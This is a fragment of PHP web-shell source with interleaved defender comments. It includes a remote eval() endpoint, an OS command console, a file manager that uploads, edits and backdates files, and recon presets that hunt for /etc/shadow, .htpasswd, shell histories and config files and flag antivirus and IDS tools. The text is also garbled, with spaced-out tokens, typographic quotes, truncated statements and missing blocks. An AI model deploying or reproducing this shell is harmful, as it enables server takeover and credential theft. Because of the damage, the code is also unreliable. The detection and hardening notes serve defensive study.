return sprintf (‘% 1.2f’, $ s / 1073741824). ‘GB’;
elseif ($ s> = 1048576)
return sprintf (‘% 1.2f’, $ s / 1048576). ‘MB’;
elseif ($ s> = 1024)
return sprintf (‘% 1.2f’, $ s / 1024). ‘KB’;
else
return $ s. ‘B’;
}
// Renders a numeric file mode (as returned by fileperms()) as a ten-character
// `ls -l` style string.
// The first character comes from the file-type bits, tested from the highest mask
// down: socket 's', symlink 'l', regular '-', block device 'b', directory 'd',
// character device 'c', FIFO 'p', otherwise 'u'.
// The next nine characters are the owner/group/other r, w, x flags; the execute
// positions show s/S (0x0800 setuid, 0x0400 setgid) or t/T (0x0200 sticky), lower case
// when the execute bit is also set and upper case when it is not.
function perms ($ p) {
if (($ p & 0xC000) == 0xC000) $ i = ‘s’;
elseif (($ p & 0xA000) == 0xA000) $ i = ‘l’;
elseif (($ p & 0x8000) == 0x8000) $ i = ‘-‘;
elseif (($ p & 0x6000) == 0x6000) $ i = ‘b’;
elseif (($ p & 0x4000) == 0x4000) $ i = ‘d’;
elseif (($ p & 0x2000) == 0x2000) $ i = ‘c’;
elseif (($ p & 0x1000) == 0x1000) $ i = ‘p’;
else $ i = ‘u’;
$ i. = (($ p & 0x0100)? ‘r’: ‘-‘);
$ i. = (($ p & 0x0080)? ‘w’: ‘-‘);
$ i. = (($ p & 0x0040)? ​​(($ p & 0x0800)? ‘s’: ‘x’): (($ p & 0x0800)? ‘S’: ‘-‘));
$ i. = (($ p & 0x0020)? ‘r’: ‘-‘);
$ i. = (($ p & 0x0010)? ‘w’: ‘-‘);
$ i. = (($ p & 0x0008)? (($ p & 0x0400)? ‘s’: ‘x’): (($ p & 0x0400)? ‘S’: ‘-‘));
$ i. = (($ p & 0x0004)? ‘r’: ‘-‘);
$ i. = (($ p & 0x0002)? ‘w’: ‘-‘);
$ i. = (($ p & 0x0001)? (($ p & 0x0200)? ‘t’: ‘x’): (($ p & 0x0200)? ‘T’: ‘-‘));
return $ i;
}
// Returns the perms() string for path $f wrapped in a coloured <font> tag:
// red when the path is not readable by the PHP process, white when it is readable but
// not writable, and yellow (#FFDB5F) when it is writable. The colour thus marks, per
// entry, where the web server account has write access.
function viewPermsColor ($ f) {
if (! @is_readable ($ f))
return ‘<font color = # FF0000> <b>’. perms (@fileperms ($ f)). ‘</ b> </ font > ‘;
elseif (! @is_writable ($ f))
return ‘<font color = white> <b>’. perms (@fileperms ($ f)). ‘</ b> </ font>’;
else
return ‘<font color = # FFDB5F> <b>’. perms (@fileperms ($ f)). ‘</ b> </ font>’;
}
// Lists the entries of $dir. Uses scandir() when that function exists; otherwise it
// falls back to opendir()/readdir(), so the listing still works when scandir() has
// been put in disable_functions.
// In the fallback path $files is never initialised and the handle is never closed, so
// an empty or unreadable directory returns an undefined variable.
function hardScandir ($ dir) {
if (function_exists (“scandir”
)) { return scandir ($ dir);
} else {
$ dh = opendir ($ dir);
while (false! == ($ filename = readdir ($ dh)))
$ files [] = $ filename;
return $ files;
}
}
// Looks up program name $p by handing a `which` command string to ex(), the file's
// command-execution helper, and returns its output, or false when the output is empty.
// $p is concatenated into the command without escaping; the callers visible in this
// file pass fixed tool names.
// NOTE(review): the literal reads ‘which’ with no trailing space in this copy,
// presumably lost in extraction.
function which ($ p) {
$ path = ex (‘which’. $ p);
if (! empty ($ path))
return $ path;
return false;
}
// Remote-control endpoint.
// Without a 'p1' value it prints a serialize()d array holding php_uname(), the PHP
// version, the VERSION constant and the safe_mode setting — a fingerprint of the host.
// With 'p1' set, the value is passed straight to eval(), i.e. the caller's PHP source
// is executed with the web server account's privileges. The cookie/password gate near
// the top of the file is the only check visible in this listing ahead of it.
// Responders finding this function should treat the host as having run arbitrary code
// and scope the investigation beyond this single file.
function actionRC () {
if (! @ $ _ POST [‘p1’])) {
$ a = array (
“uname” => php_uname (),
“php_version” => phpversion (),
“VERSION” => VERSION,
” safemode “=> @ini_get (‘safe_mode’)
);
echo serialize ($ a);
} else {
eval ($ _ POST [‘p1’]));
}
}
function prototype ($ k, $ v) {
$ _COOKIE [$ k] = $ v;
setcookie ($ k, $ v);

hardHeader ();
echo ‘<h1> Server security information </ h1> <div class = content>’;
// Prints one labelled row of the "Server security information" page.
// $n is the label and $v the value; nothing is printed when the trimmed value is empty.
// Single-line values are followed by <br>; values containing a newline are wrapped in
// <pre class=ml1>.
// $v is echoed without HTML escaping, and callers pass file contents and command
// output, so markup inside those sources is rendered as-is.
function showSecParam ($ n, $ v) {
$ v = trim ($ v);
if ($ v) {
echo ‘<span>’. $ n. ‘: </ span>’;
if (strpos ($ v, “\ n”) === false)
echo $ v. ‘<br>’;
else
echo ‘<pre class = ml1>’. $ v. ‘</ pre>’;
}
}
showSecParam (‘Server software’, @getenv (‘SERVER_SOFTWARE’));
if (function_exists (‘apache_get_modules’))
showSecParam (‘Loaded Apache modules’, implode (‘,’, apache_get_modules ()));
showSecParam (‘Disabled PHP Functions’, $ GLOBALS [‘ disable_functions’]? $ GLOBALS [‘disable_functions’]:’ none ‘);
showSecParam (‘Open base dir’, @ini_get (‘open_basedir’));
showSecParam (‘Safe mode exec dir’, @ini_get (‘safe_mode_exec_dir’));
showSecParam (‘Safe mode include dir’, @ini_get (‘safe_mode_include_dir’));
showSecParam (‘cURL support’, function_exists (‘curl_version’)? ‘enabled’: ‘no’);
$ temp = array ();
if (function_exists (‘mysql_get_client_info’))
$ temp [] = “MySql (” .mysql_get_client_info (). “)”;
if (function_exists (‘mssql_connect’))
$ temp [] = “MSSQL”;
if (function_exists (‘pg_connect’))
$ temp [] = “PostgreSQL”;
if (function_exists (‘oci_connect’))
$ temp [] = “Oracle”;
showSecParam (‘Supported databases’, implode (‘, ‘, $ temp));
echo ‘<br>’;
if ($ GLOBALS [‘os’] == ‘nix’) {
showSecParam (‘Readable / etc / passwd’, @is_readable (‘/ etc / passwd’)? “yes <a href = ‘#’ onclick = ‘g (\” FilesTools \ “, \” / etc / \ “, \ “passwd \”) ‘> [view] </a> “:’ no ‘);
showSecParam (‘Readable / etc / shadow’, @is_readable (‘/ etc / shadow’)? “yes <a href = ‘#’ onclick = ‘g (\” FilesTools \ “, \” / etc / \ “, \ “shadow \”) ‘> [view] </a> “:’ no ‘);
showSecParam (‘OS version’, @file_get_contents (‘/ proc / version’));
showSecParam (‘Distr name’, @file_get_contents (‘/ etc / issue.net’));
// Host reconnaissance, run only when safe_mode is off.
// Three name lists are checked one entry at a time through which(): build tools and
// interpreters ($userful, truncated in this copy), security tooling ($danger:
// antivirus daemons, rootkit checkers, firewalls, intrusion detection and
// log-monitoring programs) and download utilities ($downloaders). The names found are
// printed under the headings 'Userful', 'Danger' and 'Downloaders'.
// After that it prints `df -h` output and the contents of /etc/hosts and /etc/fstab.
// Detection: which() shells out once per name, so loading this page produces a burst of
// short-lived `which <tool>` child processes under the web server account — a
// process-audit pattern worth alerting on.
if (! $ GLOBALS [‘safe_mode’]) {
$ userful = array (‘gcc’, ‘lcc’, ‘cc’, ‘ld’, ‘make’, ‘php’,
$ danger = array (‘kav’, ‘nod32’, ‘bdcored’, ‘uvscan’, ‘sav’, ‘drwebd’, ‘clamd’, ‘rkhunter’, ‘chkrootkit’, ‘iptables’,’ ipfw ‘,’ tripwire ‘,’ shieldcc ‘,’ portsentry ‘,’ snort ‘,’ ossec ‘,’ lidsadm ‘,’ tcplodg ‘,’ sxid ‘,’ logcheck ‘,’ logwatch ‘,’ sysmask ‘,’ zmbscap ‘,’ sawmill ‘ , ‘wormscan’, ‘ninja’);
$ downloaders = array (‘wget’, ‘fetch’, ‘lynx’, ‘links’, ‘curl’, ‘get’, ‘lwp-mirror’);
echo ‘<br>’;
$ temp = array ();
foreach ($ userful as $?)
if (which ($?))
$ temp [] = $ ?;
showSecParam (‘Userful’, implode (‘,’, $ temp));
$ temp = array ();
foreach ($ danger as $?)
if (which ($?))
$ temp [] = $ ?;
showSecParam (‘Danger’, implode (‘,’, $ temp));
$ temp = array ();
foreach ($ downloaders as $?)
if (which ($?))
$ temp [] = $ ?;
showSecParam (‘Downloaders’, implode (‘,’, $ temp));
echo ‘<br/>’;
showSecParam (‘HDD space’, ex (‘df -h’));
showSecParam (‘Hosts’, @file_get_contents (‘/ etc / hosts’));
showSecParam (‘Mount options’, @file_get_contents (‘/ etc / fstab’));
}
} else {
showSecParam (‘OS Version’, ex (‘see’));
showSecParam (‘Account Settings’, iconv (‘CP866’, ‘UTF-8’, ex (‘net accounts’)));
showSecParam (‘User Accounts’, iconv (‘CP866’, ‘UTF-8’, ex (‘net user’)));
}
echo ‘</ div>’;
hardFooter ();

if (@ $ _ POST [‘p2’] == ‘download’) {
if (@is_file ($ _ POST [‘p1’])) && @is_readable ($ _ POST [‘p1’])) {
ob_start (“ob_gzhandler”, 4096);
header (“Content-Disposition: attachment; filename =”. basename ($ _ POST [‘p1’])));
if (function_exists (“mime_content_type”)) {
$ type = @mime_content_type ($ _ POST [‘p1’]);
header (“Content-Type:”. $ type);
} else
header (“Content-Type: application / octet-stream”);
$ fp = @fopen ($ _ POST [‘p1’], “r”);
if ($ fp) {
while (! @ feof ($ fp))
echo @fread ($ fp, 1024);
fclose ($ fp);
}
} exit;
}
if (@ $ _ POST [‘p2’

$ fp = @fopen ($ _ POST [‘p1’], ‘w’);
if ($ fp) {
$ _POST [‘p2’] = “edit”;
fclose ($ fp);
}
}
}
hardHeader ();
echo ‘<h1> File tools </ h1> <div class = content>’;
if (! file_exists (@ $ _ POST [‘p1’])) {
echo ‘File not exists’;
hardFooter ();
return;
}
$ uid = @posix_getpwuid (@fileowner ($ _ POST [‘p1’])));
if (! $ uid) {
$ uid [‘name’] = @fileowner ($ _ POST [‘p1’]);
$ gid [‘name’] = @filegroup ($ _ POST [‘p1’]);
} else $ gid = @posix_getgrgid (@filegroup ($ _ POST [‘p1’])));
echo ‘<span> Name: </ span>’ .htmlspecialchars (@basename ($ _ POST [‘p1’])). ‘ <span> Size: </ span> ‘. (is_file ($ _ POST [‘ p1 ‘])? viewSize (filesize ($ _ POST [‘ p1 ‘])):’ – ‘).’ <span> Permission: </ span> ‘.viewPermsColor ($ _ POST [‘ p1 ‘])).’ <span> Owner / Group: </ span> ‘. $ uid [‘ name ‘].’ / ‘. $ gid [‘ name ‘].’ ‘<br>’;
echo ‘<span> Create time: </ span>’ .date (‘Ymd H: i: s’, filectime ($ _ POST [‘ p1 ‘])).’ <span> Access time: </ span> ‘.date (‘ Ymd H: i: s ‘, fileatime ($ _ POST [‘ p1 ‘])).’ <span> Modify time: </ span> ‘.date (‘ Ymd H: i: s’, filemtime ($ _ POST [‘p1’])). ‘<br> <br>’;
if (empty ($ _ POST [‘
p2 ‘])) $ _POST [‘ p2 ‘] =’ view ‘;
if (is_file ($ _ POST [‘p1’]))
$ m = array (‘View’, ‘Highlight’, ‘Download’, ‘Hexdump’, ‘Edit’, ‘Chmod’, ‘Rename’, ‘Touch’, ‘Frame’);
else
$ m = array (‘Chmod’, ‘Rename’, ‘Touch’);
foreach ($ m as $ v)
echo ‘<a href = # onclick = “g (null, null, \’ ‘. urlencode ($ _ POST [‘ p1 ‘])).’ \ ‘, \’ ‘. strtolower ($ v). ‘\’) “> ‘. ((strtolower ($ v) == @ $ _ POST [‘ p2 ‘])?’ <b> [‘. $ v.’] </ b> ‘: $ v ). ‘</a>’;
echo ‘<br> <br>’;
switch ($ _ POST [‘p2’])) {
case ‘view’:
echo ‘<pre class = ml1>’;
$ fp = @fopen ($ _ POST [‘p1’], ‘r’);
if ($ fp) {
while (! @feof ($ fp))
echo htmlspecialchars (@fread ($ fp, 1024));
@fclose ($ fp);
}
echo ‘</ pre>’;
break;
case ‘highlight’:
if (@is_readable ($ _ POST [‘p1’
])) { echo ‘<div class = ml1 style = “background-color: # e1e1e1; color: black;”>’;
$ oRb = @highlight_file ($ _ POST [‘p1’], true);
echo str_replace (array (‘<span’, ‘</ span>’), array (‘<font’, ‘</ font>’), $ oRb). ‘</ div>’;
}
break;
case ‘chmod’:
if (! empty ($ _ POST [‘p3’])) {
$ perms = 0;
for ($ i = strlen ($ _ POST [‘p3’]) – 1; $ i> = 0; – $ i)
$ perms + = (int) $ _ POST [‘p3’] [$ i] * pow ( 8, (strlen ($ _ POST [‘p3’]) – $ i-1));
if (! @ chmod ($ _ POST [‘p1’], $ perms))
echo ‘Can \’ t set permissions! <br> <script> document.mf.p3.value = “”; </ script> ‘;
}
clearstatcache ();
echo ‘<script> p3 _ = “”; </ script> <form onsubmit = “g (null, null, \”‘. urlencode ($ _ POST [‘p1’]). ‘\’, null,
break;
case ‘edit’:
if (! is_writable ($ _ POST [‘p1’])) {
echo ‘File isn \’ t writeable ‘;
break;
}
if (! empty ($ _ POST [‘p3’])) {
$ time = @filemtime ($ _ POST [‘p1’]);
$ _POST [‘p3’] = substr ($ _ POST [‘p3’], 1);
$ fp = @fopen ($ _ POST [‘p1’], “w”);
if ($ fp) {
@fwrite ($ fp, $ _ POST [‘p3’]);
@fclose ($ fp);
echo ‘Saved! <br> <br> <script> p3 _ = “”; </ script>’;
@touch ($ _ POST [‘p1’], $ time, $ time);
}
}
echo ‘<form onsubmit = “g (null, null, \’ ‘. urlencode ($ _ POST [‘ p1 ‘]))’ ‘, null, \’ 1 \ ‘+ this.text.value);

while (! @feof ($ fp))
echo htmlspecialchars (@fread ($ fp, 1024));
@fclose ($ fp);
}
echo ‘</ textarea> <input type = submit value = “submit”> </ form>’;
break;
case ‘hexdump’:
$ c = @file_get_contents ($ _ POST [‘p1’]);
$ n = 0;
$ h = array (‘00000000 <br>’, ”, ”);
$ len = strlen ($ c);
for ($ i = 0; $ i <$ len; ++ $ i) {
$ h [1]. = sprintf (‘% 02X’, ord ($ c [$ i])). ‘ ‘;
switch (ord ($ c [$ i])) {
case 0: $ h [2]. = ”; break;
case 9: $ h [2]. = ”; break;
case 10: $ h [2]. = ”; break;
case 13: $ h [2]. = ”; break;
default: $ h [2]. = $ c [$ i]; break;
}
$ n ++;
if ($ n == 32) {
$ n = 0;
if ($ i + 1 <$ len) {$ h [0]. = sprintf (‘% 08X’, $ i + 1). ‘<br>’;}
$ h [1]. = ‘<br>’ ;
$ h [2]. = “\ n”;
}
}
echo ‘<table cellspacing = 1 cellpadding = 5 bgcolor = # 222> <tr> <td bgcolor = # 202832> <span style = “font-weight: normal;”> <pre>’. $ h [0] . ‘</ pre> </ span> </ td> <td bgcolor = # 060a10> <pre>’. $ h [1]. ‘</ pre> </ td> <td bgcolor = # 202832> <pre > ‘. htmlspecialchars ($ h [2]).’ </ pre> </ td> </ tr> </ table> ‘;
break;
case ‘rename’:
if (! empty ($ _ POST [‘p3’])) {
if (! @ rename ($ _ POST [‘p1’], $ _POST [‘p3’]))
echo ‘Can \’ t rename! <br> ‘;
else
die (‘<script> g (null, null, “‘. urlencode ($ _ POST [‘p3’]). ‘”, null, “”) </ script>’);
}
echo ‘<form onsubmit = “g (null, null, \’ ‘. urlencode ($ _ POST [‘ p1 ‘]))’ ‘, null, this.name.value); return false;”> <input type = text name = name value = “‘. htmlspecialchars ($ _ POST [‘ p1 ‘])).'”> <input type = submit value = “submit”> </ form> ‘;
break;
case ‘touch’:
if (! empty ($ _ POST [‘p3’])) {
$ time = strtotime ($ _ POST [‘p3’]);
if ($ time) {
if (! touch ($ _ POST [‘p1’], $ time, $ time))
echo ‘Fail!’;
else
echo ‘Touched!’;
} else echo ‘Bad time format!’;
}
clearstatcache ();
echo ‘<script> p3 _ = “”; </ script> <form onsubmit = “g (null, null, \”‘. urlencode ($ _ POST [‘p1’]). ‘\’, null, this.touch. value); return false; “> <input type = text name = touch value =” ‘. date (“Ymd H: i: s”, @filemtime ($ _ POST [‘ p1 ‘])).’ “> <input type = submit value = “submit”> </ form> ‘;
break;
/ * (?) 12.2015 mitryz * /
case ‘frame’:
$ frameSrc = substr (htmlspecialchars ($ GLOBALS [‘cwd’]), strlen (htmlspecialchars ($ _ SERVER [‘DOCUMENT_ROOT’]))));
if ($ frameSrc [0]! = ‘/’)
$ frameSrc = ‘/’. $ frameSrc;
if ($ frameSrc [strlen ($ frameSrc) – 1]! = ‘/’)
$ frameSrc = $ frameSrc. ‘/’;
$ frameSrc = $ frameSrc. htmlspecialchars ($ _ POST [‘p1’]);
echo ‘<iframe width = “100%” height = “900px” scrolling = “no” src =’. $ frameSrc. ‘ onload = “onload = height = contentDocument.body.scrollHeight”> </ iframe> ‘;
break;
}
echo ‘</ div>’;
hardFooter ();
}
// Preset menu for the console action: label => command line, selected by $os ('win' or anything else).
// actionConsole() prints an entry whose command compares equal to '' as an <optgroup> heading
// instead of a selectable option (the "Find" / "Locate" rows appear to be such headings).
// Defender note: every preset is host reconnaissance - listening sockets, process list, SUID/SGID
// and world-writable files, and credential-bearing files (.htpasswd, .bash_history, .mysql_history,
// .fetchmailrc, config*.php, service.pwd). find/locate/netstat/net started by the web-server
// account is therefore a practical process-audit signal, and the label strings below are stable
// text for content scanning of PHP files on disk.
if ($ os == ‘win’)
$ aliases = array (
“List Directory” => “dir”,
“Find index.php in current dir” => “dir / s / w / b index.php”,
“Find * config * .php in current dir” => “dir / s / w / b * config * .php”,
“Show active connections” => “netstat -an”,
“Show running services” => “net start “,
” User accounts “=>
“net user”, “Show computers” => “net view”,
“ARP Table” => “arp -a”,
“IP Configuration” => “ipconfig / all”
);
else
$ aliases = array (
“List dir” => “ls -lha”,
“list file attributes on a Linux second extended file system” => “lsattr -va”,
“show opened ports” => “netstat -an | grep -i listen “,
” process status “=>” ps aux “,
” Find “=>” “,
” find all suid files “=>” find / -type f -perm -04000 -ls “,
” find suid files in current dir “=>” find. -type f -perm -04000 -ls “,
” find all sgid files “=>” find / -type f -perm -02000 -ls “,
” find sgid files in current dir ” => “find. -type f -perm -02000 -ls”,
“find config.inc.php files”=> “find / -type f -name config.inc.php”,
“find config * files” => “find / -type f -name \” config * \ “”,
“find config * files in current dir” => “find. -type f -name \” config * \ “”,
“find all writable folders and files” => “find / -perm -2 -ls”,
“find all writable folders and files in current dir “=>” find. -perm -2 -ls “,
” find all service.pwd files “=>” find / -type f -name service.pwd “,
” find service.pwd files in current dir “=>” find. -type f -name service.pwd “,
” find all .htpasswd files “=>” find / -type f -name .htpasswd “,
” find .htpasswd files in current dir ” => “find. -type f -name .htpasswd”,
“find all .bash_history files” => “find / -type f -name .bash_history”,
“find .bash_history files in current dir” => “find. -type f -name .bash_history”,
“find all .fetchmailrc files” => “find / -type f -name .fetchmailrc”,
“find .fetchmailrc files in current dir” => “find. -type f -name .fetchmailrc”,
“Locate” => ” “,
” locate httpd.conf files “=>” locate httpd.conf “,
” locate vhosts.conf files “=>” locate vhosts.conf “,
” locate proftpd.conf files “=>” locate proftpd.conf “,
“locate psybnc.conf files” => “locate psybnc.conf”,
“locate my.conf files” => “locate my.conf”,
“locate admin.php files” => “locate admin.php”,
“locate cfg.php files “=>” locate cfg.php “,
“locate conf.php files” => “locate conf.php”,
“locate config.dat files” => “locate config.dat”,
“locate config.php files” => “locate config.php”,
“locate config.inc files” => “locate config.inc”,
“locate config.inc.php” => “locate config.inc.php”,
“locate config.default.php files” => “locate config. default.php “,
” locate config * files “=>” locate config “,
” locate .conf files “=>” locate ‘.conf’ “,
” locate .pwd files “=>” locate ‘.pwd’ “,
“locate .sql files” => “locate ‘.sql'”,
“locate .htpasswd files” => “locate ‘.htpasswd'”,
“locate .bash_history files” => “locate ‘.bash_history'”,
“locate .mysql_history files “=>”locate ‘.mysql_history’ “,
” locate .fetchmailrc files “=>” locate ‘.fetchmailrc’ “,
” locate backup files “=>” locate backup “,
” locate dump files “=>” locate dump “,
“locate priv files” => “locate priv”
);
/**
 * Console action: passes the command in $_POST['p1'] to ex() (defined outside this excerpt) and
 * returns the output, either as a JavaScript fragment (AJAX mode) or inside a full HTML page.
 *
 * Request fields read here: p1 (command line), p2 (non-empty => append a stderr redirect),
 * ajax, charset. UI state is stored through prototype() (defined outside this excerpt) under
 * names prefixed with md5(HTTP_HOST) - 'stderr_to_out' and 'ajax' - and read back from $_COOKIE
 * when the form is rendered.
 *
 * Defender notes:
 *  - This is request-driven OS command execution; nothing in this function restricts the command.
 *  - Log/WAF indicators visible in this block: POST bodies with p1/p2/ajax/charset fields sent to
 *    one PHP file, and cookies named <32 hex chars>ajax / <32 hex chars>stderr_to_out.
 *  - The AJAX reply is a byte length, a newline, then JavaScript that assigns to d.cf.output -
 *    a response shape that is unusual for a normal application endpoint.
 *  - Mitigation lives outside the script: restrict process-spawning functions in php.ini
 *    (disable_functions), keep the docroot non-writable for the PHP worker, and alert on shells
 *    or binaries spawned by the web-server account.
 */
function actionConsole () {
// p2 doubles as the "show errors" checkbox: when set, stderr is redirected into the captured output.
if (! empty ($ _ POST [‘p1’]) &&! empty ($ _ POST [‘p2’])) {
prototype (md5 ($ _ SERVER [‘HTTP_HOST’]). ‘stderr_to_out’, true );
$ _POST [‘p1’]. = ‘2> & 1’;
} elseif (! empty ($ _ POST [‘p1’])))
prototype (md5 ($ _ SERVER [‘HTTP_HOST’]). ‘stderr_to_out’, 0);
// AJAX mode: build a JavaScript snippet in an output buffer and exit without rendering the page.
if (isset ($ _ POST [‘ajax’])) {
prototype (md5 ($ _ SERVER [‘HTTP_HOST’]). ‘ajax’, true);
ob_start ();
echo “d.cf.cmd.value = ”; \ n”;
// Command echo plus ex() output, escaped with addcslashes() for embedding in a JS string literal
// and converted from the request charset to UTF-8.
$ temp = @iconv ($ _ POST [‘charset’], ‘UTF-8’, addcslashes (“\ n $”. $ _ POST [‘p1’]. “\ n” .ex ($ _ POST [‘ p1 ‘]), “\ n \ r \ t \’ \ 0”));
// A trailing "cd <dir>" in the command also changes PHP's own working directory, and the new
// path is sent back to the client so later requests carry it.
if (preg_match (“!. * cd \ s + ([^;] +) $!”, $ _ POST [‘p1’], $ match)) {
if (@chdir ($ match [1])) {
$ GLOBALS [‘cwd’] = @getcwd ();
echo “c _ = ‘”. $ GLOBALS [‘ cwd ‘]. “‘;”;
}
}
echo “d.cf.output.value + = ‘”. $ temp. “‘;”;
echo “d.cf.output.scrollTop = d.cf.output.scrollHeight;”;
$ temp = ob_get_clean ();
// Length-prefixed reply: byte count, newline, then the JavaScript payload.
echo strlen ($ temp), “\ n”, $ temp;
exit;
}
if (empty ($ _ POST [‘ajax’]) &&! empty ($ _ POST [‘p1’]))
prototype (md5 ($ _ SERVER [‘HTTP_HOST’]). ‘ajax’, 0);
hardHeader ();
// Client-side command history: key codes 38 (up) and 40 (down) step through the cmds array.
echo “<script>
if (window.Event) window.captureEvents (Event.KEYDOWN);
var cmds = new Array (”);
var cur = 0;
function kp (e) {
var n = (window.Event)? e.which: e.keyCode;
if (n == 38) {
cur–;
if (cur> = 0)
document.cf.cmd.value = cmds [cur];
else
cur ++;
} else if (n == 40) {
cur ++;
if (cur <cmds.length)
document.cf.cmd.value = cmds [cur];
else
cur–;
}
}
function add (cmd) {
cmds.pop ();
cmds.push (cmd);
cmds.push (”);
cur = cmds.length-1;
}
</ script> “;
echo ‘<h1> Console </ h1> <div class = content> <form name = cf onsubmit = “if (d.cf.cmd.value == \’ clear \ ‘) {d.cf.output.value = \ ‘\’; d.cf.cmd.value = \ ‘\’; return false;} add (this.cmd.value); if (this.ajax.checked) {a (null, null, this.cmd. value, this.show_errors.checked? 1: \ ‘\’);} else {g (null, null, this.cmd.value, this.show_errors.checked? 1: \ ‘\’);} return false; ” > <label> <select name = alias> ‘;
// Preset menu built from the global $aliases table; an empty command becomes a group heading.
foreach ($ GLOBALS [‘aliases’] as $ n => $ v) {
if ($ v == ”) {
echo ‘<optgroup label = “-‘. htmlspecialchars ($ n) .’-“> </ optgroup> ‘;
continue;
}
echo ‘<option value = “‘. htmlspecialchars ($ v). ‘”>’. $ n. ‘</ option>’;

// NOTE(review): the closing brace of the foreach above is not present in this copy of the page.
echo ‘</ select> </ label> <input type = button onclick = “add (d.cf.alias.value); if (d.cf.ajax.checked) {a (null, null, d.cf. alias.value, d.cf.show_errors.checked? 1: \ ‘\’);} else {g (null, null, d.cf.alias.value, d.cf.show_errors.checked? 1: \ ‘\ ‘);} “value =” submit “> <nobr> <input type = checkbox name = ajax value = 1’. (@ $ _ COOKIE [md5 ($ _ SERVER [‘HTTP_HOST’]). ‘ajax’]? ‘checked ‘:’ ‘).’> send using AJAX <input type = checkbox name = show_errors value = 1 ‘. (! empty ($ _ POST [‘ p2 ‘])) || $ _COOKIE [md5 ($ _ SERVER [‘ HTTP_HOST ‘] ) ‘stderr_to_out’]? ‘checked’: ”). ‘> redirect stderr to stdout (2> & 1) </ nobr> <br/> <textarea class = bigarea name = output style = “border-bottom: 0 ; margin-top: 5px; ” readonly> ‘;
// Non-AJAX mode: the command and its output are HTML-escaped into the read-only textarea.
if (! empty ($ _ POST [‘p1’])) {
echo htmlspecialchars (“$”. $ _ POST [‘p1’]. “\ n” .ex ($ _ POST [‘p1’]));
}
echo ‘</ textarea> <table style = “border: 1px solid # 060a10; background-color: # 060a10; border-top: 0px;” cellpadding = 0 cellspacing = 0 width = “100%”> <tr> <td style = “padding-left: 4px; width: 13px;”> $ </ td> <td> <input type = text name = cmd style = “border: 0px; width: 100%;” onkeydown = “kp (event);”> </ td> </ tr> </ table> ‘;
echo ‘</ form> </ div> <script> d.cf.cmd.focus (); </ script>’;
hardFooter ();
}
/**
 * PHP action: evaluates the string in $_POST['p1'] with eval(), or - when $_POST['p2'] is
 * 'info' - prints phpinfo() output with part of its CSS stripped by the preg_replace() calls.
 *
 * Unlike the other actions in this excerpt, the AJAX flag is written straight into the $_COOKIE
 * superglobal rather than through prototype(), so as written it only changes the current request.
 *
 * Defender notes:
 *  - eval() on request data runs inside the PHP worker itself. Hardening that only blocks
 *    process-spawning functions does not cover this path; file and network access of the worker
 *    account are the effective limit, so least privilege on that account is what contains it.
 *  - phpinfo() output discloses configuration and environment values; treat any exposure of it
 *    as an information leak when reconstructing what an intruder could have seen.
 *  - Static detection: eval() applied directly to a $_POST element, together with the page
 *    strings 'Execution PHP-code' and 'PhpOutput', are stable scan targets.
 */
function actionPhp () {
if (isset ($ _ POST [‘ajax’])) {
$ _COOKIE [md5 ($ _ SERVER [‘HTTP_HOST’]). ‘ajax’] = true;
ob_start ();
// Request body field p1 is executed as PHP source; its output lands in the buffer opened above.
eval ($ _ POST [‘p1’]);
// NOTE(review): the next statement is cut off in this copy of the page.
$ temp = “document.getElementById (‘PhpOutput’).
// Length-prefixed reply, same shape as the console action's AJAX response.
echo strlen ($ temp), “\ n”, $ temp;
exit;
}
hardHeader ();
// phpinfo branch: capture the output, then rewrite its stylesheet rules before printing.
if (isset ($ _ POST [‘p2’])) && ($ _POST [‘p2’] == ‘info’)) {
echo ‘<h1> PHP info </ h1> <div class = content>’;
ob_start ();
phpinfo ();
$ tmp = ob_get_clean ();
$ tmp = preg_replace (‘! body {. *}! msiU’, ”, $ tmp);
$ tmp = preg_replace (‘! a: \ w + {. *}! msiU’, ”, $ tmp);
$ tmp = preg_replace (‘! h1! msiU’, ‘h2’, $ tmp);
$ tmp = preg_replace (‘! td, th {(. *)}! msiU’, ‘. e, .v, .h, .h th {$ 1}’, $ tmp);
$ tmp = preg_replace (‘! body, td, th, h2, h2 {. *}! msiU’, ”, $ tmp);
echo $ tmp;
echo ‘</ div> < br> ‘;
}
if (empty ($ _ POST [‘ajax’]) &&! empty ($ _ POST [‘p1’]))
$ _COOKIE [md5 ($ _ SERVER [‘HTTP_HOST’]). ‘Ajax’] = false;
echo ‘<h1> Execution PHP-code </ h1> <div class = content> <form name = pf method = post onsubmit = “if (this.ajax.checked) {a (null, null, this.code.value );} else {g (null, null, this.code.value, \ ‘\’);} return false; “> <textarea name = code class = bigarea id = PhpCode> ‘. (! empty ($ _ POST [ ‘p1’])? htmlspecialchars ($ _ POST [‘p1’]): ”). ” </ textarea> <input type = submit value = Eval style = “margin-top: 5px”> ‘;
// NOTE(review): the statement below is truncated and the lines that followed it (presumably the
// non-AJAX evaluation of p1) are missing from this copy.
echo ‘<input type = checkbox name = ajax value = 1’. ($ _ COOKIE [md5 ($ _ SERVER [‘HTTP_HOST’]). ‘ajax’]? ‘checked’: ”). ‘> send using AJAX </ form> <pre id = PhpOutput style = “‘. (empty ($ _ POST [‘ p1 ‘])?’ display: none; ‘:

}
echo ‘</ pre> </ div>’;
hardFooter ();
}
/**
 * File-manager action: performs the operation named in $_POST['p1'] (uploadFile, mkdir, delete,
 * paste) and then renders a sortable listing of the directory in $_POST['c'] or $GLOBALS['cwd'].
 *
 * A "clipboard" is kept on the client: any other p1 value is stored, via prototype() (defined
 * outside this excerpt), as 'act' together with the serialized selection 'f' and source directory
 * 'c'; a later 'paste' reads them back from $_COOKIE and runs copy / move / zip / unzip / tar.
 *
 * Defender notes:
 *  - Uploads are moved to the client-supplied file name with no extension or path check, so a
 *    writable directory that also executes PHP is the condition that makes this dangerous;
 *    serve upload and cache directories with script execution disabled.
 *  - Delete, copy, move and extract all act with the web-server account's rights; code and
 *    configuration owned by a different user and not writable by the worker limits the damage.
 *  - Indicators visible here: cookies named act / f / c (f holding a PHP-serialized array),
 *    POST field a=FilesMan, and archives named hard_<date>.zip or hard_<date>.tar.gz.
 *  - unserialize() on a cookie is an object-injection sink in its own right; the same pattern
 *    in legitimate code deserves a finding.
 *  - File-integrity monitoring on the docroot covers what this action changes; the per-file
 *    stat calls during listing produce no log entries of their own in a default setup.
 */
function actionFilesMan () {
// Clipboard selection arrives as a serialized array in cookie 'f'.
if (! empty ($ _COOKIE [‘f’]))
$ _COOKIE [‘f’] = @unserialize ($ _ COOKIE [‘f’]);

if (! empty ($ _ POST [‘p1’])) {
switch ($ _ POST [‘p1’])) {
case ‘uploadFile’:
